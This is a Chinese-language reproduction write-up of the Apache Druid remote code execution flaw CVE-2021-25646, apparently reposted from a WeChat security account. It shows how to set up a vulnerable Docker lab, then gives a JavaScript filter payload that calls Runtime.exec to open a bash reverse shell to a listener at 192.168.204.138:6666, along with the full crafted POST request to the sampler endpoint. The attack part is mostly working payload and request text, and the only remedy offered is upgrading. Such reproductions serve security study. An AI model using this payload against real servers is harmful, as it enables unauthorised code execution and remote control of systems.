漏洞概述
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。
Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。
影响版本
Apache Druid < 0.20.1
环境搭建
这里使用docker来搭建
拉取镜像并启动Apache Druid:0.16.0版本的环境
docker pull fokkodriesprong/docker-druiddocker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
访问your-ip:8888即可看到页面
漏洞复现
点击Load data -> Local disk
依次填入
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
默认next
到filter项
抓包修改filter为
{ "type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.204.138/6666 0>&1')}", "dimension":"added", "":{ "enabled":"true" }}
然后发送POST数据包
POST /druid/indexer/v1/sampler?for=schema HTTP/1.1Host: 192.168.204.138:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 1018Origin: http://192.168.204.138:8888Connection: closeReferer: http://192.168.204.138:8888/unified-console.html{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.204.138/6666 0>&1')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}
成功反弹shell
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):Apache Druid RCE(CVE-2021-25646)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论